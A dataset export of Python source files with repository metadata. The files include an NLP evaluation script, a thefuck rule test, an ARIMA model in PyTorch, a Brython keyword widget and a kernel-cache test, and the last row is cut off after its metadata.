Dataset schema (one row per source file). Columns, dtypes, and observed ranges (⌀ marks nullable columns):

- hexsha: string, length 40
- size: int64, 5 to 2.06M
- ext: string, 10 classes
- lang: string, 1 value
- max_stars_repo_path: string, length 3 to 248
- max_stars_repo_name: string, length 5 to 125
- max_stars_repo_head_hexsha: string, length 40 to 78
- max_stars_repo_licenses: list, length 1 to 10
- max_stars_count: int64, 1 to 191k ⌀
- max_stars_repo_stars_event_min_datetime: string, length 24 ⌀
- max_stars_repo_stars_event_max_datetime: string, length 24 ⌀
- max_issues_repo_path: string, length 3 to 248
- max_issues_repo_name: string, length 5 to 125
- max_issues_repo_head_hexsha: string, length 40 to 78
- max_issues_repo_licenses: list, length 1 to 10
- max_issues_count: int64, 1 to 67k ⌀
- max_issues_repo_issues_event_min_datetime: string, length 24 ⌀
- max_issues_repo_issues_event_max_datetime: string, length 24 ⌀
- max_forks_repo_path: string, length 3 to 248
- max_forks_repo_name: string, length 5 to 125
- max_forks_repo_head_hexsha: string, length 40 to 78
- max_forks_repo_licenses: list, length 1 to 10
- max_forks_count: int64, 1 to 105k ⌀
- max_forks_repo_forks_event_min_datetime: string, length 24 ⌀
- max_forks_repo_forks_event_max_datetime: string, length 24 ⌀
- content: string, length 5 to 2.06M
- avg_line_length: float64, 1 to 1.02M
- max_line_length: int64, 3 to 1.03M
- alphanum_fraction: float64, 0 to 1
- count_classes: int64, 0 to 1.6M
- score_classes: float64, 0 to 1
- count_generators: int64, 0 to 651k
- score_generators: float64, 0 to 1
- count_decorators: int64, 0 to 990k
- score_decorators: float64, 0 to 1
- count_async_functions: int64, 0 to 235k
- score_async_functions: float64, 0 to 1
- count_documentation: int64, 0 to 1.04M
- score_documentation: float64, 0 to 1
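In the rows that follow, each score_* value appears to be the matching count_* value divided by size (for the first row, 365 / 10,460 ≈ 0.034895 and 1,949 / 10,460 ≈ 0.186329). A minimal sketch of that assumed relationship; the helper name and the example row are illustrative only:

```python
def derive_scores(row: dict) -> dict:
    """Recompute score_* fields, assuming score_x = count_x / size."""
    size = row["size"]
    return {
        key.replace("count_", "score_", 1): (row[key] / size if size else 0.0)
        for key in row
        if key.startswith("count_")
    }

example_row = {"size": 10460, "count_classes": 365, "count_documentation": 1949}
print(derive_scores(example_row))
# {'score_classes': 0.0348..., 'score_documentation': 0.1863...}
```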
hexsha: 42a9d7f0de1fb5aee832bc5e97c48ecbdecd3930 | size: 10,460 | ext: py | lang: Python
max_stars: path scripts/pos_eval.py | repo ProKil/sparse-text-prototype @ e7369dc981fb2c2a94ccb4edca4a7e7c7d7543cd | licenses ["MIT"] | count 19 | events 2020-11-05T12:17:45.000Z to 2021-11-17T08:43:50.000Z
max_issues: path scripts/pos_eval.py | repo ProKil/sparse-text-prototype @ e7369dc981fb2c2a94ccb4edca4a7e7c7d7543cd | licenses ["MIT"] | count 1 | events 2021-07-08T13:30:15.000Z to 2021-07-08T13:30:15.000Z
max_forks: path scripts/pos_eval.py | repo ProKil/sparse-text-prototype @ e7369dc981fb2c2a94ccb4edca4a7e7c7d7543cd | licenses ["MIT"] | count 2 | events 2020-12-20T13:19:14.000Z to 2021-06-25T20:18:00.000Z
content:
import os
import argparse
import subprocess
import random
import edlib
from typing import List
from collections import Counter
import stanza
class ExtractMetric(object):
"""used for precision recall"""
def __init__(self, nume=0, denom_p=0, denom_r=0, precision=0, recall=0, f1=0):
super(ExtractMetric, self).__init__()
self.nume = nume
self.denom_p = denom_p
self.denom_r = denom_r
self.precision = precision
self.recall = recall
self.f1 = f1
def read_file(fname, len_cut):
res1, res2 = [], []
with open(fname) as fin:
for line in fin:
x, y = line.rstrip().split('\t')
if len(x.split()) > len_cut or len(y.split()) > len_cut:
continue
res1.append(x)
res2.append(y)
return res1, res2
def write_file(fname: str, data: List[str]):
with open(fname, 'w') as fout:
for sent in data:
if isinstance(sent, list):
fout.write('{}\n'.format(' '.join(sent)))
else:
fout.write('{}\n'.format(sent))
def eval_edit(prototype, example):
def flat_cigar(cigar):
"""flatten the result path returned by edlib.align
"""
r = []
pointer = 0
while pointer < len(cigar):
num = []
while cigar[pointer].isdigit():
num.append(cigar[pointer])
pointer += 1
num = int(''.join(num))
r.extend([cigar[pointer]] * num)
pointer += 1
return r
res = {}
for p_sent, e_sent in zip(prototype, example):
p_pos = [x.upos for x in p_sent.words]
e_pos = [x.upos for x in e_sent.words]
p_text = [x.text for x in p_sent.words]
e_text = [x.text for x in e_sent.words]
edit_operation = edlib.align(e_text, p_text, task='path')
edit_operation = flat_cigar(edit_operation['cigar'])
new_p_text = []
new_e_text = []
new_p_pos = []
new_e_pos = []
src_cur = tgt_cur = 0
for edit in edit_operation:
if edit == '=' or edit == 'X':
new_p_text.append(p_text[src_cur])
new_p_pos.append(p_pos[src_cur])
new_e_text.append(e_text[tgt_cur])
new_e_pos.append(e_pos[tgt_cur])
src_cur += 1
tgt_cur += 1
elif edit == 'I':
new_p_text.append(-1)
new_p_pos.append(-1)
new_e_text.append(e_text[tgt_cur])
new_e_pos.append(e_pos[tgt_cur])
tgt_cur += 1
elif edit == 'D':
new_p_text.append(p_text[src_cur])
new_p_pos.append(p_pos[src_cur])
new_e_text.append(-1)
new_e_pos.append(-1)
src_cur += 1
else:
raise ValueError('{} edit operation is invalid!'.format(edit))
for i, edit in enumerate(edit_operation):
if edit not in res:
res[edit] = Counter()
if edit == '=':
res[edit]['{}={}'.format(new_p_pos[i], new_e_pos[i])] += 1
elif edit == 'X':
res[edit]['{}->{}'.format(new_p_pos[i], new_e_pos[i])] += 1
elif edit == 'I':
res[edit]['+{}'.format(new_e_pos[i])] += 1
elif edit == 'D':
res[edit]['-{}'.format(new_p_pos[i])] += 1
else:
raise ValueError
return res
def eval_f1(prototype, example):
res = {}
for p_sent, e_sent in zip(prototype, example):
p_pos = [x.upos for x in p_sent.words]
e_pos = [x.upos for x in e_sent.words]
p_text = [x.text for x in p_sent.words]
e_text = [x.text for x in e_sent.words]
e_word_counter = Counter(e_text)
for word, pos in zip(p_text, p_pos):
if pos not in res:
res[pos] = ExtractMetric(
nume=0,
denom_p=0,
denom_r=0,
precision=0,
recall=0,
f1=0
)
res[pos].denom_r += 1
if e_word_counter[word] > 0:
e_word_counter[word] -= 1
res[pos].nume += 1
e_pos_counter = Counter(e_pos)
for k, v in e_pos_counter.items():
if k not in res:
res[k] = ExtractMetric(
nume=0,
denom_p=0,
denom_r=0,
precision=0,
recall=0,
f1=0
)
res[k].denom_p += v
for k, v in res.items():
if res[k].denom_p != 0 and res[k].denom_r != 0 and res[k].nume != 0:
res[k].precision = res[k].nume / res[k].denom_p
res[k].recall = res[k].nume / res[k].denom_r
res[k].f1 = 2 * res[k].precision * res[k].recall / (res[k].precision + res[k].recall)
return res
def sentence_bleu(ref_path, hypo_path):
sent_bleu = subprocess.getoutput(
"fairseq-score --ref {} --sys {} --sentence-bleu".format(ref_path, hypo_path))
bleu_list = [float(line.split()[3].rstrip(',')) for line in sent_bleu.split('\n')[1:]]
return sum(bleu_list) / len(bleu_list)
def generate_rand_prototype(exp_dir, num):
dataset_to_template = {
"coco40k": "support_prototype/datasets/coco/coco.template.40k.txt",
"yelp": "support_prototype/datasets/yelp_data/yelp.template.50k.lower.txt",
"yelp_large": "support_prototype/datasets/yelp_large_data/yelp_large.template.100k.txt",
}
def parse_exp_dir(name):
dataset = name.rstrip('/').split('/')[-1].split('_')[0]
return dataset
dataset = parse_exp_dir(exp_dir)
return subprocess.getoutput(
"shuf -n {} {}".format(num, dataset_to_template[dataset])).split('\n')
parser = argparse.ArgumentParser(description='Evaluate analysis metrics')
parser.add_argument('--prefix', type=str, choices=['inference', 'generation'],
help='prediction file prefix')
parser.add_argument('--exp-dir', type=str, help='output directory')
args = parser.parse_args()
fout = open(os.path.join(args.exp_dir, 'analysis_{}_res.txt'.format(args.prefix)), 'w')
len_cut = 1000
prototypes, examples = read_file(os.path.join(args.exp_dir, '{}_analysis_input.txt'.format(args.prefix)), len_cut=len_cut)
prototype_path = os.path.join(args.exp_dir, 'prototype.txt')
prototype_pos_path = os.path.join(args.exp_dir, 'prototype_pos.txt')
prototype_rand_path = os.path.join(args.exp_dir, 'prototype_rand.txt')
prototype_pos_rand_path = os.path.join(args.exp_dir, 'prototype_pos_rand.txt')
example_path = os.path.join(args.exp_dir, 'example.txt')
example_pos_path = os.path.join(args.exp_dir, 'example_pos.txt')
prototypes_rand = generate_rand_prototype(args.exp_dir, len(examples))
write_file(prototype_path, prototypes)
write_file(example_path, examples)
write_file(prototype_rand_path, prototypes_rand)
# surface BLEU
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_path, example_rand_path))
bleu = sentence_bleu(prototype_rand_path, example_path)
print('Regular BLEU (random baseline): \n{}'.format(bleu))
fout.write('Regular BLEU (random baseline): \n{}'.format(bleu))
fout.write('\n\n\n')
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_path, example_path))
bleu = sentence_bleu(prototype_path, example_path)
print('Regular BLEU: \n{}'.format(bleu))
fout.write('Regular BLEU: \n{}'.format(bleu))
fout.write('\n\n\n')
# POS tagging
print('POS tagging')
nlp = stanza.Pipeline(lang='en', processors='tokenize,mwt,pos', tokenize_pretokenized=True)
prototype_doc = nlp('\n'.join(prototypes))
example_doc = nlp('\n'.join(examples))
prototype_rand_doc = nlp('\n'.join(prototypes_rand))
prototypes_pos = [[word.upos for word in sent.words] for sent in prototype_doc.sentences]
examples_pos = [[word.upos for word in sent.words] for sent in example_doc.sentences]
prototypes_pos_rand = [[word.upos for word in sent.words]for sent in prototype_rand_doc.sentences]
write_file(prototype_pos_path, prototypes_pos)
write_file(example_pos_path, examples_pos)
write_file(prototype_pos_rand_path, prototypes_pos_rand)
# POS BLEU
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_pos_path, example_pos_rand_path))
bleu = sentence_bleu(prototype_pos_rand_path, example_pos_path)
print('POS BLEU (random baseline): \n{}'.format(bleu))
fout.write('POS BLEU (random baseline): \n{}'.format(bleu))
fout.write('\n\n\n')
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_pos_path, example_pos_path))
bleu = sentence_bleu(prototype_pos_path, example_pos_path)
print('POS BLEU: \n{}'.format(bleu))
fout.write('POS BLEU: \n{}'.format(bleu))
fout.write('\n\n\n')
# break down precision and recall
print("compute precision, recall, f1")
assert len(prototypes) == len(prototypes_pos)
assert len(examples) == len(examples_pos)
res = eval_f1(list(prototype_rand_doc.sentences), list(example_doc.sentences))
res = sorted(res.items(), key=lambda item: -item[1].f1)
fout.write('random baseline precision-recall\n')
fout.write('POS recall precision f1\n')
for k, v in res:
fout.write('{} {} {} {}\n'.format(k, v.recall, v.precision, v.f1))
fout.write('\n\n\n')
res = eval_f1(list(prototype_doc.sentences), list(example_doc.sentences))
res = sorted(res.items(), key=lambda item: -item[1].f1)
fout.write('precision-recall\n')
fout.write('POS recall precision f1\n')
for k, v in res:
fout.write('{} {} {} {}\n'.format(k, v.recall, v.precision, v.f1))
fout.write('\n\n\n')
# edit operations
print("edit analysis")
res = eval_edit(list(prototype_doc.sentences), list(example_doc.sentences))
total = sum([sum(v.values()) for k, v in res.items()])
fout.write('total: {}\n'.format(total))
res = sorted(res.items(), key=lambda item: (-sum(item[1].values())))
for k, v in res:
fout.write('{}: {}\n'.format(k, sum(v.values())))
for k1, v1 in v.most_common():
fout.write('{}: {} ({:.3f}), '.format(k1, v1, v1 / sum(v.values())))
fout.write('\n\n')
fout.close()
avg_line_length: 33.41853 | max_line_length: 122 | alphanum_fraction: 0.603537 | count_classes: 365 | score_classes: 0.034895 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,949 | score_documentation: 0.186329

hexsha: 42aa82728f6722cbbdd0c68a0e10c8dd5f0958ee | size: 582 | ext: py | lang: Python
max_stars: path tests/rules/test_git_stash_pop.py | repo RogueScholar/thefuck-termux @ cc33d5fa0077b2b2323b8a62f3478ff8efef3fba | licenses ["MIT"] | count null | events null
max_issues: path tests/rules/test_git_stash_pop.py | repo RogueScholar/thefuck-termux @ cc33d5fa0077b2b2323b8a62f3478ff8efef3fba | licenses ["MIT"] | count null | events null
max_forks: path tests/rules/test_git_stash_pop.py | repo RogueScholar/thefuck-termux @ cc33d5fa0077b2b2323b8a62f3478ff8efef3fba | licenses ["MIT"] | count null | events null
content:
import pytest
from thefuck.rules.git_stash_pop import get_new_command
from thefuck.rules.git_stash_pop import match
from thefuck.types import Command
@pytest.fixture
def output():
return """error: Your local changes to the following files would be overwritten by merge:"""
def test_match(output):
assert match(Command("git stash pop", output))
assert not match(Command("git stash", ""))
def test_get_new_command(output):
assert (get_new_command(
Command("git stash pop",
output)) == "git add --update && git stash pop && git reset .")
avg_line_length: 26.454545 | max_line_length: 96 | alphanum_fraction: 0.707904 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 126 | score_decorators: 0.216495 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 178 | score_documentation: 0.305842

hexsha: 42ab556174e9603454893f6f485c837afcd3bad8 | size: 3,642 | ext: py | lang: Python
max_stars: path src/arima_model.py | repo SaharCarmel/ARIMA @ c54e8554f1c4a95c25687bdf35b4296ed6bd78d6 | licenses ["MIT"] | count null | events null
max_issues: path src/arima_model.py | repo SaharCarmel/ARIMA @ c54e8554f1c4a95c25687bdf35b4296ed6bd78d6 | licenses ["MIT"] | count null | events null
max_forks: path src/arima_model.py | repo SaharCarmel/ARIMA @ c54e8554f1c4a95c25687bdf35b4296ed6bd78d6 | licenses ["MIT"] | count null | events null
content:
""" The ARIMA model. """
import torch
import numpy as np
class ARIMA(torch.nn.Module):
"""ARIMA [summary]
"""
def __init__(self,
p: int = 0,
d: int = 0,
q: int = 0) -> None:
"""__init__ General ARIMA model constructor.
Args:
p (int): The number of lag observations included in the model,
also called the lag order.
d (int): The number of times that the raw observations are
differenced, also called the degree of differencing.
q (int): The size of the moving average window,
also called the order of moving average.
"""
super(ARIMA, self).__init__()
self.p = p
self.pWeights = torch.rand(p)
self.pWeights.requires_grad = True
self.q = q
self.qWeights = torch.rand(q)
self.qWeights.requires_grad = True
self.d = d
self.dWeights = torch.rand(d)
self.dWeights.requires_grad = True
self.drift = torch.rand(1)
pass
def forward(self, x: torch.Tensor, err: torch.Tensor) -> torch.Tensor:
"""forward the function that defines the ARIMA(0,1,1) model.
It was written specifically for the case of ARIMA(0,1,1).
Args:
x (torch.Tensor): The input data. All the past observations
err (torch.Tensor): The error term. A normal distribution vector.
Returns:
torch.Tensor: The output of the model. The current prediction.
"""
zData = torch.diff(x)
zPred = self.dWeights*zData[-1] + \
self.qWeights*err[-2] + err[-1] + self.drift
aPred = zPred + x[-1]
return aPred
def generateSample(self, length: int) -> torch.Tensor:
"""generateSample An helper function to generate a sample of data.
Args:
length (int): The length of the sample.
Returns:
torch.Tensor: The generated sample.
"""
sample = torch.zeros(length)
noise = torch.tensor(np.random.normal(
loc=0, scale=1, size=length), dtype=torch.float32)
sample[0] = noise[0]
with torch.no_grad():
for i in range(length-2):
sample[i+2] = self.forward(sample[:i+2], noise[:i+2])
pass
return sample
def fit(self,
trainData: torch.Tensor,
epochs: int,
learningRate: float) -> None:
"""fit A function to fit the model. It is a wrapper of the
Args:
trainData (torch.Tensor): The training data.
epochs (int): The number of epochs.
learningRate (float): The learning rate.
"""
dataLength = len(trainData)
errors = torch.tensor(np.random.normal(
loc=0, scale=1, size=dataLength), dtype=torch.float32)
for epoch in range(epochs):
prediction = torch.zeros(dataLength)
for i in range(dataLength-2):
prediction[i +
2] = self.forward(trainData[0:i+2], errors[0:i+2])
pass
loss = torch.mean(torch.pow(trainData - prediction, 2))
print(f'Epoch {epoch} Loss {loss}')
loss.backward()
self.dWeights.data = self.dWeights.data - \
learningRate * self.dWeights.grad.data
self.dWeights.grad.data.zero_()
self.qWeights.data = self.qWeights.data - \
learningRate * self.qWeights.grad.data
self.qWeights.grad.data.zero_()
pass
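A brief usage sketch for the class defined above, assuming the ARIMA(0,1,1) configuration its forward pass was written for; the series length, epoch count, and learning rate below are arbitrary illustrations:

```python
import torch

# Instantiate the ARIMA(0,1,1)-style model defined above.
model = ARIMA(p=0, d=1, q=1)

# Draw a synthetic series from the model itself, then fit the model to it.
series = model.generateSample(length=200)
model.fit(trainData=series, epochs=5, learningRate=1e-3)

# One-step-ahead prediction from past observations and fresh noise draws.
noise = torch.randn(len(series))
print(model.forward(series, noise))
```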
avg_line_length: 34.358491 | max_line_length: 77 | alphanum_fraction: 0.549149 | count_classes: 3,581 | score_classes: 0.983251 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,386 | score_documentation: 0.38056

hexsha: 42ab6fa034b5730a8c76b4b76e6056f1b558984c | size: 687 | ext: py | lang: Python
max_stars: path problems/slidingwindow/Solution1100.py | repo akalu/cs-problems-python @ 9b1bd8e3932be62135a38a77f955ded9a766b654 | licenses ["MIT"] | count null | events null
max_issues: path problems/slidingwindow/Solution1100.py | repo akalu/cs-problems-python @ 9b1bd8e3932be62135a38a77f955ded9a766b654 | licenses ["MIT"] | count null | events null
max_forks: path problems/slidingwindow/Solution1100.py | repo akalu/cs-problems-python @ 9b1bd8e3932be62135a38a77f955ded9a766b654 | licenses ["MIT"] | count null | events null
content:
"""
Sliding window
Given a string S, return the number of substrings of length K with no
repeated characters.
Example 1:
Input: S = "havefunonleetcode", K = 5 Output: 6 Explanation: There are 6
substrings they are : 'havef','avefu','vefun','efuno','etcod','tcode'.
counter havefunonleetcode
IDEA:
1) for each letter in the string setup a counter and
2) update unique counter each time when counter[let] hits 0, 1 or 2 (magic numbers)
aaabac
|||
123
0) a:3 unique=0
1) a:2 b:1 unique=1
2) a:2 b:1 unique=1
3) a:2 b:1 c:1 unique=1+2=3
"""
class Solution1100:
pass
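The class body above is only a stub; a runnable sketch of the sliding-window counting idea described in the docstring, with the function name and variable names chosen here for illustration:

```python
from collections import Counter

def count_k_substrings_no_repeats(s: str, k: int) -> int:
    """Count length-k substrings of s whose characters are all distinct."""
    if k == 0 or k > len(s):
        return 0
    window = Counter(s[:k])               # per-letter counter for the current window
    count = 1 if len(window) == k else 0  # k distinct keys means no repeats
    for i in range(k, len(s)):
        window[s[i]] += 1                 # slide the window right by one
        window[s[i - k]] -= 1
        if window[s[i - k]] == 0:
            del window[s[i - k]]
        if len(window) == k:
            count += 1
    return count

print(count_k_substrings_no_repeats("havefunonleetcode", 5))  # 6
```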
avg_line_length: 18.078947 | max_line_length: 86 | alphanum_fraction: 0.58952 | count_classes: 28 | score_classes: 0.040757 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 656 | score_documentation: 0.954876

hexsha: 42ab8cf968e58717ef4f86c899c0440ef99114b5 | size: 26 | ext: py | lang: Python
max_stars: path the_file_propagator/__init__.py | repo joeflack4/the-file-propagator @ c72fdad7774c82c8bfa6bf5253b83f6bb1e4e713 | licenses ["MIT"] | count null | events null
max_issues: path the_file_propagator/__init__.py | repo joeflack4/the-file-propagator @ c72fdad7774c82c8bfa6bf5253b83f6bb1e4e713 | licenses ["MIT"] | count null | events null
max_forks: path the_file_propagator/__init__.py | repo joeflack4/the-file-propagator @ c72fdad7774c82c8bfa6bf5253b83f6bb1e4e713 | licenses ["MIT"] | count null | events null
content:
"""The File Propagator"""
avg_line_length: 13 | max_line_length: 25 | alphanum_fraction: 0.653846 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 25 | score_documentation: 0.961538

hexsha: 42ab9f264f4ecd8a53e0ce06b3bb77538b433100 | size: 4,681 | ext: py | lang: Python
max_stars: path src/wa_kat/templates/static/js/Lib/site-packages/components/keyword_handler.py | repo WebArchivCZ/WA-KAT @ 719f7607222f5a4d917c535b2da6371184222101 | licenses ["MIT"] | count 3 | events 2017-03-23T12:59:21.000Z to 2017-11-22T08:23:14.000Z
max_issues: path src/wa_kat/templates/static/js/Lib/site-packages/components/keyword_handler.py | repo WebArchivCZ/WA-KAT @ 719f7607222f5a4d917c535b2da6371184222101 | licenses ["MIT"] | count 89 | events 2015-06-28T22:10:28.000Z to 2017-01-30T16:06:05.000Z
max_forks: path src/wa_kat/templates/static/js/Lib/site-packages/components/keyword_handler.py | repo WebarchivCZ/WA-KAT @ 719f7607222f5a4d917c535b2da6371184222101 | licenses ["MIT"] | count 1 | events 2015-12-17T02:56:59.000Z to 2015-12-17T02:56:59.000Z
content:
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Interpreter version: brython (http://brython.info) (like python3)
#
# Imports =====================================================================
from os.path import join
from browser import window
from browser import document
# virtual filesystem / modules provided by REST API
from virtual_fs import settings
# Functions & classes =========================================================
class KeywordListHandler(object):
"""
This class is used to control the GUI for the list of keywords.
It allows user to add new keyword, remove present keyword and get a list
of defined keywords.
"""
def __init__(self, el_id, whole_id=None):
if whole_id is None:
whole_id = "whole_" + el_id
self.el = document[el_id]
self.whole_el = document[whole_id]
self.all_lists_el = document["whole_keyword_list"]
self.keywords = []
self._remover = """
<span class='kw_remover'
title='Odstranit klíčové slovo.'
id='kw_remover_id_%d'>
✖
</span>
"""
self._render()
def _render(self):
"""
Render the HTML code for all the :attr:`keywords` stored in this class.
This method is called after each change in :attr:`keywords`.
"""
# hide the list in case that there is no `keyword` to be displayed
if self.keywords:
self.whole_el.style.display = "block"
self.all_lists_el.style.display = "block"
else:
self.whole_el.style.display = "none"
if "<li>" not in self.all_lists_el.html:
self.all_lists_el.style.display = "none"
# construct the HTML code for each keyword
html_lines = (
"<li class='kw_enum'>{0} {1}</li>\n".format(
keyword,
(self._remover % cnt)
)
for cnt, keyword in enumerate(self.keywords)
)
# put the keywords into the HTML code of the page
self.el.innerHTML = "<ol>\n%s\n</ol>\n" % "\n".join(html_lines)
# this function is used to bind the ✖ to function for removing the
# keyword
def keyword_remover(keyword):
def remover(ev):
self.remove_keyword(keyword)
return remover
# go thru all the keywords and bind them to keyword_remover()
for cnt, keyword in enumerate(self.keywords):
uid = "kw_remover_id_%d" % cnt
el = document[uid]
el.bind("click", keyword_remover(keyword))
def add_keyword(self, keyword):
"""
Add `keyword` to :attr:`keywords`.
Args:
keyword (str): New keyword.
"""
self.keywords.append(keyword)
self._render()
def remove_keyword(self, keyword):
"""
Remove `keyword` from :attr:`keywords`.
Args:
keyword (str): Keyword which should be removed.
"""
self.keywords.remove(keyword)
self._render()
def reset(self):
"""
Reset the widget to the default state.
"""
self.keywords = []
self._render()
UserKeywordHandler = KeywordListHandler("user_keyword_list")
AlephKeywordHandler = KeywordListHandler("aleph_keyword_list")
AanalysisKeywordHandler = KeywordListHandler("analysis_keyword_list")
class KeywordAdder(object):
"""
    This class is here to control the typeahead input bar with keyword suggestion.
Keywords selected from suggestions are then mapped to
:class:`KeywordListHandler`.
"""
intput_el = document["keyword_adder"]
@classmethod
def on_select_callback(cls, selected_item):
"""
This method defines the action taken when user selects the keyword from
suggestion engine.
Args:
selected_item (str): Keyword selected by the user.
Returns:
str: Value on which the <input> element will be set.
"""
UserKeywordHandler.add_keyword(selected_item)
return ""
@classmethod
def set_kw_typeahead_input(cls):
"""
Map the typeahead input to remote dataset.
"""
# get reference to parent element
parent_id = cls.intput_el.parent.id
if "typeahead" not in parent_id.lower():
parent_id = cls.intput_el.parent.parent.id
window.make_keyword_typeahead_tag(
"#" + parent_id,
join(settings.API_PATH, "kw_list.json"),
cls.on_select_callback,
)
KeywordAdder.set_kw_typeahead_input()
avg_line_length: 29.25625 | max_line_length: 79 | alphanum_fraction: 0.580432 | count_classes: 4,001 | score_classes: 0.853456 | count_generators: 0 | score_generators: 0 | count_decorators: 911 | score_decorators: 0.194326 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 2,281 | score_documentation: 0.486561

hexsha: 42abdb34b5121a34132a5ff61f5b37cf1ca828bc | size: 53 | ext: py | lang: Python
max_stars: path scripts/rnn/gru/__init__.py | repo bfeng/CryptoGRU @ 65f6fe9eba981fea65fc665ff16938bf3a593001 | licenses ["MIT"] | count 1 | events 2022-01-12T03:18:55.000Z to 2022-01-12T03:18:55.000Z
max_issues: path scripts/rnn/gru/__init__.py | repo bfeng/CryptoGRU @ 65f6fe9eba981fea65fc665ff16938bf3a593001 | licenses ["MIT"] | count null | events null
max_forks: path scripts/rnn/gru/__init__.py | repo bfeng/CryptoGRU @ 65f6fe9eba981fea65fc665ff16938bf3a593001 | licenses ["MIT"] | count null | events null
content:
from .grucell import MyGRUCell
from .gru import MyGRU
avg_line_length: 26.5 | max_line_length: 30 | alphanum_fraction: 0.830189 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 0 | score_documentation: 0

hexsha: 42b002236c965251bc510639be4dce4dd1300339 | size: 2,946 | ext: py | lang: Python
max_stars: path ZZZ_OtherDemo/00-dyld-832.7.3/testing/kernel-cache-tests/kext-missing-weak-bind/test.py | repo 1079278593/TreasureChest @ 8b1ebe04ed7c2ed399c4ecf3b75b3fee0a1aced8 | licenses ["MIT"] | count null | events null
max_issues: path ZZZ_OtherDemo/00-dyld-832.7.3/testing/kernel-cache-tests/kext-missing-weak-bind/test.py | repo 1079278593/TreasureChest @ 8b1ebe04ed7c2ed399c4ecf3b75b3fee0a1aced8 | licenses ["MIT"] | count null | events null
max_forks: path ZZZ_OtherDemo/00-dyld-832.7.3/testing/kernel-cache-tests/kext-missing-weak-bind/test.py | repo 1079278593/TreasureChest @ 8b1ebe04ed7c2ed399c4ecf3b75b3fee0a1aced8 | licenses ["MIT"] | count null | events null
content:
#!/usr/bin/python2.7
import os
import KernelCollection
# Check that weak binds can be missing, so long as we check for the magic symbol
def check(kernel_cache):
kernel_cache.buildKernelCollection("arm64", "/kext-missing-weak-bind/main.kc", "/kext-missing-weak-bind/main.kernel", "/kext-missing-weak-bind/extensions", ["com.apple.foo", "com.apple.bar"], [])
kernel_cache.analyze("/kext-missing-weak-bind/main.kc", ["-layout", "-arch", "arm64"])
assert kernel_cache.dictionary()["cache-segments"][3]["name"] == "__DATA_CONST"
assert kernel_cache.dictionary()["cache-segments"][3]["vmAddr"] == "0x18000"
assert len(kernel_cache.dictionary()["dylibs"]) == 3
assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.kernel"
assert kernel_cache.dictionary()["dylibs"][1]["name"] == "com.apple.bar"
assert kernel_cache.dictionary()["dylibs"][2]["name"] == "com.apple.foo"
# Symbols
kernel_cache.analyze("/kext-missing-weak-bind/main.kc", ["-symbols", "-arch", "arm64"])
# kernel
assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.kernel"
assert kernel_cache.dictionary()["dylibs"][0]["global-symbols"][2]["name"] == "_gOSKextUnresolved"
assert kernel_cache.dictionary()["dylibs"][0]["global-symbols"][2]["vmAddr"] == "0x20000"
# Check the fixups
kernel_cache.analyze("/kext-missing-weak-bind/main.kc", ["-fixups", "-arch", "arm64"])
assert len(kernel_cache.dictionary()["fixups"]) == 4
assert kernel_cache.dictionary()["fixups"]["0x18000"] == "kc(0) + 0x20000"
assert kernel_cache.dictionary()["fixups"]["0x18008"] == "kc(0) + 0x20000"
assert kernel_cache.dictionary()["fixups"]["0x18010"] == "kc(0) + 0x20000"
assert kernel_cache.dictionary()["fixups"]["0x18018"] == "kc(0) + 0x20000"
assert len(kernel_cache.dictionary()["dylibs"]) == 3
assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.kernel"
assert kernel_cache.dictionary()["dylibs"][0]["fixups"] == "none"
assert kernel_cache.dictionary()["dylibs"][1]["name"] == "com.apple.bar"
assert kernel_cache.dictionary()["dylibs"][1]["fixups"] == "none"
assert kernel_cache.dictionary()["dylibs"][2]["name"] == "com.apple.foo"
assert kernel_cache.dictionary()["dylibs"][2]["fixups"] == "none"
# [~]> xcrun -sdk iphoneos.internal cc -arch arm64 -Wl,-static -mkernel -nostdlib -Wl,-add_split_seg_info -Wl,-rename_section,__TEXT,__text,__TEXT_EXEC,__text -Wl,-e,__start -Wl,-pagezero_size,0x0 -Wl,-pie -Wl,-sectcreate,__LINKINFO,__symbolsets,SymbolSets.plist -Wl,-segprot,__LINKINFO,r--,r-- main.c -o main.kernel
# [~]> xcrun -sdk iphoneos.internal cc -arch arm64 -Wl,-kext -mkernel -nostdlib -Wl,-add_split_seg_info foo.c -o extensions/foo.kext/foo
# [~]> xcrun -sdk iphoneos.internal cc -arch arm64 -Wl,-kext -mkernel -nostdlib -Wl,-add_split_seg_info bar.c -o extensions/bar.kext/bar -Wl,-fixup_chains
# [~]> rm -r extensions/*.kext/*.ld
avg_line_length: 62.680851 | max_line_length: 316 | alphanum_fraction: 0.681942 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,686 | score_documentation: 0.572301

hexsha: 42b0f3205382f72fca408d985411165330e27a01 | size: 7,453 | ext: py | lang: Python
max_stars: path datahub/search/investment/models.py | repo alixedi/data-hub-api-cd-poc @ a5e5ea45bb496c0d2a06635864514af0c7d4291a | licenses ["MIT"] | count null | events null
